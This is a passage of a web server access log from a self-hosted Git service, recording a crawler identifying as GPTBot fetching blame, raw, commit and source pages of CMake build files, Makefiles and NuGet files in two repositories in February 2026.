303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:16:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:16:59:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:16:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:16:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:16:59:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 13159] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" +[17/Feb/2026:17:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32933] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:17:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10643] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10657] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10655] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16203] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16204] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16204] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16176] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json?display=rendered" [Client 74.7.227.38] [Length 11172] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 12991] [Gzip 6.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14321] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26363] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 1871] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14602] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14599] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:17:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:17:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:17:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:17:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32932] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:17:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32931] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:17:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16204] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10301] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10304] [Gzip 2.95] 